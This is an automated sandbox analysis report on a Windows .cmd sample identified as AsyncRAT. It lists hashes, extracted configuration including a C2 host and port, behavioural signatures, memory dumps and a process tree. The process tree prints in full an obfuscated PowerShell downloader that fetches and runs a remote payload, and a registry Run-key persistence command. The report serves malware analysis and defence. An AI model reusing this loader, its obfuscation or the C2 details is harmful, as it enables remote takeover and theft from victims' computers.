Overview

overview

10

Static

static

1

Dmningsanlg.cmd

windows7-x64

8

Dmningsanlg.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-11-2024 17:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Dmningsanlg.cmd

  • Size

    5KB

  • MD5

    c3740f8a31835df5862ca4dcca3f046c

  • SHA1

    fe66ea2e8830e2e05c33b2f57dde0667fcee046a

  • SHA256

    5ec6b19b04ce92c96099d82aa9f698afea763e0dd95fa33fcda302028c1ba931

  • SHA512

    d4edf552833604b184a21a095ff69be1cc260b7a31e0c5f6e02d52d8c5df9b19d315585493d0a9d8edca21f0272e5795e7f9fb3c0d05935dc11f7183a0ed7fbd

  • SSDEEP

    96:fxgDNkSWe+Y7mM2lIg3WU+ynD0jwDOe7o/SJCRNE7/WtBFCV4N6AWYs9skq7WSPu:fcWJY7J2B9+AD0jwDOe7mkCRNoWLFK4i

Score
10/10
asyncrat8nyyyydiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

asyncrat

Version

| Edit by Vinom Rat

Botnet

8nyyyy

C2

newrdb30.ooguy.com:2004

Mutex

AsyncMutex_6zcxrdjgnjGnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dmningsanlg.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1164
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden " <#Sandyish Vaabenstyringssystemers Generalers nada Etheriform Ludicrousnesses Ationsafsnittenes #>;$Raketvrn='Strygeinstrumenters';<#Lifesavings Dybfrosne Amacrinal Sugariest Sarapes Voldtgtscenter #>; function Strblinde($Pancreatitic){If ($host.DebuggerEnabled) {$Retslokales223++;}$Silius=$Weber+$Pancreatitic.'Length' - $Retslokales223; for ( $Orbitonasal=4;$Orbitonasal -lt $Silius;$Orbitonasal+=5){$repositioning=$Orbitonasal;$Cabresto+=$Pancreatitic[$Orbitonasal];}$Cabresto;}function wamfle($Cipo){ & ($Klinkende90) ($Cipo);}$Salpingopalatine=Strblinde 'J kaM Anso ebuzPyrriGausldanglBlena Lem/Lenk ';$Sydafrikaopholds236=Strblinde ' In,T P elFlaksRhin1Glyc2Damp ';$Mikroskoperings='Kha [Un lNFlyteLivetProt.UnfeS StaEBusyrmyndvRahdiAfgicRes,EFragp Sn,oGe listupNsolvt Obem BagaMistNreweaPseuGHa fE dserS ir]Batt:Ste,:CertsR.seeTaktC RaauLynlr okti EksTOpsiYud,tPWaneRAageO OvetteleoHuckCOutpOMikrlAn b=Sup $MoroS,eskyOverdGrydAEssefBrndR RedIHabiKSk maR unO Pa.P HutHCarlOPuk LRe tDm,tssHnge2Pri 3Amir6Av.c ';$Salpingopalatine+=Strblinde 'Slet5Voca. isk0B,ck Fina(DeltWNineiCissnAfm.dLogioWo cwKth.sR ad gardNPaneTKupe Stum1Ma,e0Cast. I.n0 Iri;rock haW B liFinen or6cyke4Spri;Lynf BundxRavr6Than4 .er; O,t Ext rHellv.ort:Pent1Ci.r3Inge1Pare.Kind0 Ko )Scar KnagGNanoePsyccH tek Be oExho/Ga o2Akti0 ave1Doss0Gama0C ok1Jeno0 Tal1Hove Sep.FPhoci AutrHor eFilif Hepo rebx ern/Unna1 Val3Vica1M,dt. gru0A un ';$Pretypify=Strblinde ' onUSortSNitreLap.RB.cc- KunAPaasGWebsE .ilncockt ano ';$Reattaching42=Strblinde ' Terh DamtVo stChikpIn ssDobb:Begy/Maki/ Holf My i.ysglSynke Indd CennDand.UdtueUtiduSeng/ enslStra9 ObltKry EPrimwS,bsb qu9MucosQuar6maxia D sazoogRSuf.wI kv5Fo ufForuy StoULipoi Va a WakCAlle0FurblYtrifSamb/boulPBol.i marlR,gusOrd n BoreSwarr udfe ndnUnmesPrea.Hugim Oved aspJunk ';$dramatic=Strblinde ' Fll>Udst ';$Klinkende90=Strblinde 'VertIRe.aET icXDrag ';$Ridderbegrebets='Preadhere';$Kryolite='\Fistendes.Gld';wamfle (Strblinde 'Almo$ s nG estL oveO idnBIsa aFraclGran:Avi S.ockh,ckeo FinP agBTh,ooEpisY.aitSTur.=Aspa$ Fo,eGowknbarkV ati: AllA IdePBi kPFov DAntiAEnviTMeroaBv e+Vex.$PunyKOpveR Re,Y LuxOMi oL .aniSti tHrg,ES re ');wamfle (Strblinde 'S br$ ,ongDagulWh gofladBNonraf iflbrot:.ackaC,ueCFilliMetaNSkovEHu eTS ibaFataR p oIK.liAun e= Hex$Blo.R CameSumeAMom,tepsiTOve a ystCquothAntiITheoN M sGsluk4Dil 2 at.BaltSSensp SeklVandi Bjetdrme( Aff$Triudhy eRAuriASimoM Fora olT.rigiKrumcBomm)Tuft ');wamfle (Strblinde $Mikroskoperings);$Reattaching42=$acinetaria[0];$Omstillings146=(Strblinde 'C,or$SemiGAmerlDio.O epobHeara nslT rm:DrabpPectrP rtIAfsgS Divt SemEAc i=MateNRepeEC ypWTrie-TincoAffubFrstJUnc ePylrcRottt F b SadosSan YPorts ,edTSi.ueInfrMSnab. dioN.istEInt,T Nat.S,agW askE,phebTherc VanL mi.i .ndEKandNI,cut li ');wamfle ($Omstillings146);wamfle (Strblinde ',bei$AssiP Ny,rViduiBasisBrugtTilsePh s.CoxiHdidaeBlndaPattdTetreNonarHakasOpla[Hobo$ ensPakkvr BoleTjantbutyyPharpPresiUnc fDispyCowr] Bjf=p te$,ittSSkrtaBlinlbernpDyk,iTrannS mbgCr noBrecpHaria rselFordaUn dtEkspiPicin,rede rg ');$Ripensere=Strblinde 'Vi u$BackPAspirS rui MaisBethtsmoceinsc.SkruD.esio E,awj nlnSenilNo po Cirasnusd UriF BesiLok l kaePoz (L ke$ Co R SteeRetsa SiktFaset KryaBa,icKnudhArneiLar ndrosgOver4A.on2 aar,Flag$S ifAubevuPar.ti.riotil.rHaaniErritBedoefis tBryo) Mil ';$Autoritet=$Shopboys;wamfle (Strblinde 'Tar,$HelngSemilUdlaO genBImplALeucLUd a:NysgtUinde StoKA stSBeloTBusha ,anNO vim,dkrR BiokOd lN St iPhotNMercgOscieDiphr EteNGn sEMo.kSPoly= Tk.(Orn,tHaanEAnglSHetzt Rig-BalsPNew,AGeneTBalkh,lmu Arm $ Cona,onoUFormtAkkvo Gu ROv ri SubTDem.E InbTSp.b)B nk ');while (!$tekstanmrkningernes) {wamfle (Strblinde 'Prec$Su,jgUnrilkasioSitubPodoa ennlNeur: NotT SameTamil.oduaformu jentBetnoA chmE.egaEntht xoti isocInaxabundlMoral Many Kon=D ad$bar,tScrirMiliu iggeChi. ') ;wamfle $Ripensere;wamfle (Strblinde ' In,SGrifTKnicagnavRAutot Fic- ettSSkoslGibbeD seEHoinPFo.b Cyan4 con ');wamfle (Strblinde 'Srmr$Kat.GCastl BeboMoolb UncASpaglTryk:Kin,ToffeE KnlkS ers enntstdlaSim.n icrm SabRSlu KDe tnWaugIDisoNSe.sG riEProbrSemiNKomme ReksBolo=Vris( Hj tSalveH poS legtBalu-DesiPVi iAAftaTSluthSolm Tele$ Br.ARei.UCon tOverOFoderUdviiVedrTSkriEdis,tNonp) nke ') ;wamfle (Strblinde ' Am $Salig Heal f.jO agrbS raALandLbr e:Dis SFibrt PleASpleaFlaglEnkeo Te,R PolMS resHere= Shr$,alagRancLRelaOSpejbR,deaBra lOver:presrSer,e Anfi SheNTerptTrouE alR ubdrSpidUDeripArentRobbiP umO MobnTppe+ Inf+C ke% rim$Rid APa tCDiapi ,ornCeleeInd t PurASpilrAl eI,kovaSoda. awpCSeksoM ltUOp,aNfemitRech ') ;$Reattaching42=$acinetaria[$Staalorms];}$Verves=322677;$Subarmale=31127;wamfle (Strblinde ' San$NonhgMaalLBuddo FjoB ,omaU,dylUnde:OmgakAvocRA tiLEndonAntiI SlrN BraGKommSst e Vi,d=Tru. GalGAcideSliptExtr- koCSupeOP ran .idT br eE,opNGrenTbchu Xys$Stanacatuu TatTL.etOEm,lr Li iCir.tnahueVeksT Ana ');wamfle (Strblinde 'gyro$FilagForgl BreoUnmobA neala,elAn.t:Ci erMidmeWeakcSupeo rommKurspRegieSyn nHa.vsT eoe BurdSona ,tra=Kvik Avow[PartSnattyHocksPar t aideFairmUngo. In,CJu.eo RednBrndvEf.ee Re rK.rat Hak]Glyc:Vejr:UnasF,navrMa,roDowlmUp aBK.ntaBordsA.ste Oak6Punc4,oncS zeftGuldrOrt,iO.ren PisgOmb.(Lavi$T.llKM nurDre.lDenin Co i yrunChikgSkybs P,t)Hisp ');wamfle (Strblinde 'Pass$FjerGS,ill BumORu mBAcinA p,rlProp:A.toJ EcoOOrb ROc udFremS FrdkRullR A fESelsd InssHaemSarbeEProgJTrylrR dieStr sno.e Equa=sv v Trep[CoafsPerayTor sUd,aTDeskeRetaMFu n.SolbtShorESkyrx MegTKlej.BrawEBegln.kjoCUndeO Un dGlimi.rocn DonGCruc]Pseu:Skrk:Demia ,nds ostcTyraiReafIB,on.JugggSal EUnbit A dS MestSon rBabeiRigdN D pg Men( A o$ ysirI,fueT,aeC VugoOverMLndePLignEChreNSep sAlkoeDatadTon )Cyt. ');wamfle (Strblinde 'Redu$TllegBranl Af o ndbFam A ellL Lic: DebeLv kF UdefBarneHoejkSkeltTarrsSt d=Beas$OpvaJ .knOB,anR rdsd BecS irckP.otRAdoxESortdCommS IguSForhe KonJUre RV.dlE KaosBrin.enersDo eUPresB Re.sAntiTPresRudstiMesoNI eaGUnsp(S,us$ eveVHyk.e UncrSp,tvalsiEA kysGue,,T.ot$De.ySBlinUKollBD opaStrir resmemisa .ilLBedlEO,or)Ruft ');wamfle $Effekts;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3992
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Sandyish Vaabenstyringssystemers Generalers nada Etheriform Ludicrousnesses Ationsafsnittenes #>;$Raketvrn='Strygeinstrumenters';<#Lifesavings Dybfrosne Amacrinal Sugariest Sarapes Voldtgtscenter #>; function Strblinde($Pancreatitic){If ($host.DebuggerEnabled) {$Retslokales223++;}$Silius=$Weber+$Pancreatitic.'Length' - $Retslokales223; for ( $Orbitonasal=4;$Orbitonasal -lt $Silius;$Orbitonasal+=5){$repositioning=$Orbitonasal;$Cabresto+=$Pancreatitic[$Orbitonasal];}$Cabresto;}function wamfle($Cipo){ & ($Klinkende90) ($Cipo);}$Salpingopalatine=Strblinde 'J kaM Anso ebuzPyrriGausldanglBlena Lem/Lenk ';$Sydafrikaopholds236=Strblinde ' In,T P elFlaksRhin1Glyc2Damp ';$Mikroskoperings='Kha [Un lNFlyteLivetProt.UnfeS StaEBusyrmyndvRahdiAfgicRes,EFragp Sn,oGe listupNsolvt Obem BagaMistNreweaPseuGHa fE dserS ir]Batt:Ste,:CertsR.seeTaktC RaauLynlr okti EksTOpsiYud,tPWaneRAageO OvetteleoHuckCOutpOMikrlAn b=Sup $MoroS,eskyOverdGrydAEssefBrndR RedIHabiKSk maR unO Pa.P HutHCarlOPuk LRe tDm,tssHnge2Pri 3Amir6Av.c ';$Salpingopalatine+=Strblinde 'Slet5Voca. isk0B,ck Fina(DeltWNineiCissnAfm.dLogioWo cwKth.sR ad gardNPaneTKupe Stum1Ma,e0Cast. I.n0 Iri;rock haW B liFinen or6cyke4Spri;Lynf BundxRavr6Than4 .er; O,t Ext rHellv.ort:Pent1Ci.r3Inge1Pare.Kind0 Ko )Scar KnagGNanoePsyccH tek Be oExho/Ga o2Akti0 ave1Doss0Gama0C ok1Jeno0 Tal1Hove Sep.FPhoci AutrHor eFilif Hepo rebx ern/Unna1 Val3Vica1M,dt. gru0A un ';$Pretypify=Strblinde ' onUSortSNitreLap.RB.cc- KunAPaasGWebsE .ilncockt ano ';$Reattaching42=Strblinde ' Terh DamtVo stChikpIn ssDobb:Begy/Maki/ Holf My i.ysglSynke Indd CennDand.UdtueUtiduSeng/ enslStra9 ObltKry EPrimwS,bsb qu9MucosQuar6maxia D sazoogRSuf.wI kv5Fo ufForuy StoULipoi Va a WakCAlle0FurblYtrifSamb/boulPBol.i marlR,gusOrd n BoreSwarr udfe ndnUnmesPrea.Hugim Oved aspJunk ';$dramatic=Strblinde ' Fll>Udst ';$Klinkende90=Strblinde 'VertIRe.aET icXDrag ';$Ridderbegrebets='Preadhere';$Kryolite='\Fistendes.Gld';wamfle (Strblinde 'Almo$ s nG estL oveO idnBIsa aFraclGran:Avi S.ockh,ckeo FinP agBTh,ooEpisY.aitSTur.=Aspa$ Fo,eGowknbarkV ati: AllA IdePBi kPFov DAntiAEnviTMeroaBv e+Vex.$PunyKOpveR Re,Y LuxOMi oL .aniSti tHrg,ES re ');wamfle (Strblinde 'S br$ ,ongDagulWh gofladBNonraf iflbrot:.ackaC,ueCFilliMetaNSkovEHu eTS ibaFataR p oIK.liAun e= Hex$Blo.R CameSumeAMom,tepsiTOve a ystCquothAntiITheoN M sGsluk4Dil 2 at.BaltSSensp SeklVandi Bjetdrme( Aff$Triudhy eRAuriASimoM Fora olT.rigiKrumcBomm)Tuft ');wamfle (Strblinde $Mikroskoperings);$Reattaching42=$acinetaria[0];$Omstillings146=(Strblinde 'C,or$SemiGAmerlDio.O epobHeara nslT rm:DrabpPectrP rtIAfsgS Divt SemEAc i=MateNRepeEC ypWTrie-TincoAffubFrstJUnc ePylrcRottt F b SadosSan YPorts ,edTSi.ueInfrMSnab. dioN.istEInt,T Nat.S,agW askE,phebTherc VanL mi.i .ndEKandNI,cut li ');wamfle ($Omstillings146);wamfle (Strblinde ',bei$AssiP Ny,rViduiBasisBrugtTilsePh s.CoxiHdidaeBlndaPattdTetreNonarHakasOpla[Hobo$ ensPakkvr BoleTjantbutyyPharpPresiUnc fDispyCowr] Bjf=p te$,ittSSkrtaBlinlbernpDyk,iTrannS mbgCr noBrecpHaria rselFordaUn dtEkspiPicin,rede rg ');$Ripensere=Strblinde 'Vi u$BackPAspirS rui MaisBethtsmoceinsc.SkruD.esio E,awj nlnSenilNo po Cirasnusd UriF BesiLok l kaePoz (L ke$ Co R SteeRetsa SiktFaset KryaBa,icKnudhArneiLar ndrosgOver4A.on2 aar,Flag$S ifAubevuPar.ti.riotil.rHaaniErritBedoefis tBryo) Mil ';$Autoritet=$Shopboys;wamfle (Strblinde 'Tar,$HelngSemilUdlaO genBImplALeucLUd a:NysgtUinde StoKA stSBeloTBusha ,anNO vim,dkrR BiokOd lN St iPhotNMercgOscieDiphr EteNGn sEMo.kSPoly= Tk.(Orn,tHaanEAnglSHetzt Rig-BalsPNew,AGeneTBalkh,lmu Arm $ Cona,onoUFormtAkkvo Gu ROv ri SubTDem.E InbTSp.b)B nk ');while (!$tekstanmrkningernes) {wamfle (Strblinde 'Prec$Su,jgUnrilkasioSitubPodoa ennlNeur: NotT SameTamil.oduaformu jentBetnoA chmE.egaEntht xoti isocInaxabundlMoral Many Kon=D ad$bar,tScrirMiliu iggeChi. ') ;wamfle $Ripensere;wamfle (Strblinde ' In,SGrifTKnicagnavRAutot Fic- ettSSkoslGibbeD seEHoinPFo.b Cyan4 con ');wamfle (Strblinde 'Srmr$Kat.GCastl BeboMoolb UncASpaglTryk:Kin,ToffeE KnlkS ers enntstdlaSim.n icrm SabRSlu KDe tnWaugIDisoNSe.sG riEProbrSemiNKomme ReksBolo=Vris( Hj tSalveH poS legtBalu-DesiPVi iAAftaTSluthSolm Tele$ Br.ARei.UCon tOverOFoderUdviiVedrTSkriEdis,tNonp) nke ') ;wamfle (Strblinde ' Am $Salig Heal f.jO agrbS raALandLbr e:Dis SFibrt PleASpleaFlaglEnkeo Te,R PolMS resHere= Shr$,alagRancLRelaOSpejbR,deaBra lOver:presrSer,e Anfi SheNTerptTrouE alR ubdrSpidUDeripArentRobbiP umO MobnTppe+ Inf+C ke% rim$Rid APa tCDiapi ,ornCeleeInd t PurASpilrAl eI,kovaSoda. awpCSeksoM ltUOp,aNfemitRech ') ;$Reattaching42=$acinetaria[$Staalorms];}$Verves=322677;$Subarmale=31127;wamfle (Strblinde ' San$NonhgMaalLBuddo FjoB ,omaU,dylUnde:OmgakAvocRA tiLEndonAntiI SlrN BraGKommSst e Vi,d=Tru. GalGAcideSliptExtr- koCSupeOP ran .idT br eE,opNGrenTbchu Xys$Stanacatuu TatTL.etOEm,lr Li iCir.tnahueVeksT Ana ');wamfle (Strblinde 'gyro$FilagForgl BreoUnmobA neala,elAn.t:Ci erMidmeWeakcSupeo rommKurspRegieSyn nHa.vsT eoe BurdSona ,tra=Kvik Avow[PartSnattyHocksPar t aideFairmUngo. In,CJu.eo RednBrndvEf.ee Re rK.rat Hak]Glyc:Vejr:UnasF,navrMa,roDowlmUp aBK.ntaBordsA.ste Oak6Punc4,oncS zeftGuldrOrt,iO.ren PisgOmb.(Lavi$T.llKM nurDre.lDenin Co i yrunChikgSkybs P,t)Hisp ');wamfle (Strblinde 'Pass$FjerGS,ill BumORu mBAcinA p,rlProp:A.toJ EcoOOrb ROc udFremS FrdkRullR A fESelsd InssHaemSarbeEProgJTrylrR dieStr sno.e Equa=sv v Trep[CoafsPerayTor sUd,aTDeskeRetaMFu n.SolbtShorESkyrx MegTKlej.BrawEBegln.kjoCUndeO Un dGlimi.rocn DonGCruc]Pseu:Skrk:Demia ,nds ostcTyraiReafIB,on.JugggSal EUnbit A dS MestSon rBabeiRigdN D pg Men( A o$ ysirI,fueT,aeC VugoOverMLndePLignEChreNSep sAlkoeDatadTon )Cyt. ');wamfle (Strblinde 'Redu$TllegBranl Af o ndbFam A ellL Lic: DebeLv kF UdefBarneHoejkSkeltTarrsSt d=Beas$OpvaJ .knOB,anR rdsd BecS irckP.otRAdoxESortdCommS IguSForhe KonJUre RV.dlE KaosBrin.enersDo eUPresB Re.sAntiTPresRudstiMesoNI eaGUnsp(S,us$ eveVHyk.e UncrSp,tvalsiEA kysGue,,T.ot$De.ySBlinUKollBD opaStrir resmemisa .ilLBedlEO,or)Ruft ');wamfle $Effekts;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3976
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3384
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Monostomidae" /t REG_EXPAND_SZ /d "%Kaffekanderne% -windowstyle 1 $Communalizer=(gp -Path 'HKCU:\Software\Mariti231\').Relates;%Kaffekanderne% ($Communalizer)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2608
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Monostomidae" /t REG_EXPAND_SZ /d "%Kaffekanderne% -windowstyle 1 $Communalizer=(gp -Path 'HKCU:\Software\Mariti231\').Relates;%Kaffekanderne% ($Communalizer)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:4344

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    d336b18e0e02e045650ac4f24c7ecaa7

    SHA1

    87ce962bb3aa89fc06d5eb54f1a225ae76225b1c

    SHA256

    87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27

    SHA512

    e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qdg2piwh.vjh.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Fistendes.Gld
    Filesize

    460KB

    MD5

    60db4288e01479bb81e4399461612f5b

    SHA1

    0e744813037d4768e21f73794f0ae0a27627576d

    SHA256

    c1a8ed6675c1e8b556873729628a3b3d6988055950287b66ae9253318bc64f45

    SHA512

    a60f780660a049e8adbe9a74f8ee6ad244f3e92d1d109f6c7cfa166bdccc0ed9cb7c6344e29a396e3efc9441e86ab2b6630910ffd055ab94fde0451e801654bd

    Download Submit

  • memory/3384-78-0x0000000024FB0000-0x000000002504C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/3384-75-0x0000000024B00000-0x0000000024B0A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3384-74-0x0000000024BD0000-0x0000000024C62000-memory.dmp

    Filesize

    584KB

    Download

  • memory/3384-72-0x00000000007C0000-0x0000000001A14000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/3384-73-0x00000000007C0000-0x00000000007D6000-memory.dmp

    Filesize

    88KB

    Download

  • memory/3384-62-0x00000000007C0000-0x0000000001A14000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/3976-45-0x0000000008930000-0x0000000008ED4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/3976-49-0x00000000749F0000-0x00000000751A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3976-25-0x0000000005610000-0x0000000005632000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3976-26-0x0000000005CE0000-0x0000000005D46000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3976-27-0x0000000005E00000-0x0000000005E66000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3976-35-0x0000000005EB0000-0x0000000006204000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3976-23-0x00000000749F0000-0x00000000751A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3976-39-0x00000000064C0000-0x00000000064DE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3976-40-0x00000000064E0000-0x000000000652C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3976-41-0x0000000007D00000-0x000000000837A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3976-42-0x0000000006A70000-0x0000000006A8A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3976-43-0x0000000007730000-0x00000000077C6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/3976-44-0x00000000076D0000-0x00000000076F2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3976-21-0x00000000749FE000-0x00000000749FF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3976-22-0x0000000004F20000-0x0000000004F56000-memory.dmp

    Filesize

    216KB

    Download

  • memory/3976-47-0x00000000749F0000-0x00000000751A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3976-48-0x00000000749F0000-0x00000000751A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3976-24-0x0000000005640000-0x0000000005C68000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/3976-50-0x00000000749FE000-0x00000000749FF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3976-51-0x00000000749F0000-0x00000000751A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3976-52-0x00000000749F0000-0x00000000751A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3976-54-0x00000000749F0000-0x00000000751A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3976-53-0x00000000749F0000-0x00000000751A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3976-55-0x0000000008EE0000-0x000000000DE70000-memory.dmp

    Filesize

    79.6MB

    Download

  • memory/3976-56-0x00000000749F0000-0x00000000751A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3976-57-0x00000000749F0000-0x00000000751A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3976-58-0x00000000749F0000-0x00000000751A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3976-59-0x00000000749F0000-0x00000000751A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3976-61-0x00000000749F0000-0x00000000751A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3992-2-0x00007FFCA5683000-0x00007FFCA5685000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3992-20-0x00007FFCA5680000-0x00007FFCA6141000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3992-17-0x00007FFCA5680000-0x00007FFCA6141000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3992-14-0x00007FFCA5680000-0x00007FFCA6141000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3992-13-0x00007FFCA5680000-0x00007FFCA6141000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3992-3-0x0000012464FF0000-0x0000012465012000-memory.dmp

    Filesize

    136KB

    Download